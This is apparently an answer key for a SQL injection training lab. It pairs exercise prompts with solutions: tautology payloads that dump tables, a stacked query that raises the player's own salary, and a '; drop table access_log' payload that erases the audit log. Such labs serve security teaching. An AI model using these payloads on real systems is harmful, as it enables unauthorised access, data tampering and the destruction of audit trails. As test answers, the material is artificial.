1: Look at the example table. Try to retrieve the department of the employee Bob Franco. Note that you have been granted full administrator privileges in this assignment and can access all data without authentication.
select * from employees where department = 'Marketing'
2: Try to change the department of Tobi Barnett to 'Sales'. Note that you have been granted full administrator privileges in this assignment and can access all data without authentication.
update employees set department ='Sales' where userid= 89762
3:Now try to modify the schema by adding the column "phone" (varchar(20)) to the table "employees".
alter table employees add "phone" char(20);
4:Try to grant rights to the table grant_rights
to user unauthorized_user
:
GRANT all ON grant_rights TO unauthorized_user
5:Try using the form below to retrieve all the users from the users table. You should not need to know any specific user name to get the complete list.
' or '1' = '1
6:Warning: Only one of these fields is susceptible to SQL Injection. You need to find out which, to successfully retrieve all the data.
login_count:1
user_id :1 or 1=1
7:
"SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'"; employee name:1 authentacation tan:1' or '1' ='1
8:
You just found out that Tobi and Bob both seem to earn more money than you! Of course you cannot leave it at that.
Better go and change your own salary so you are earning the most!
Remember: Your name is John Smith and your current TAN is 3SL99A.
employee name:Smith '; update employees set salary = 100000 where last_name='Smith' --
authentacation tan:
9:Now you are the top earner in your company. But do you see that? There seems to be a access_log table, where all your actions have been logged to!
Better go and delete it completely before anyone notices.
'; drop table access_log --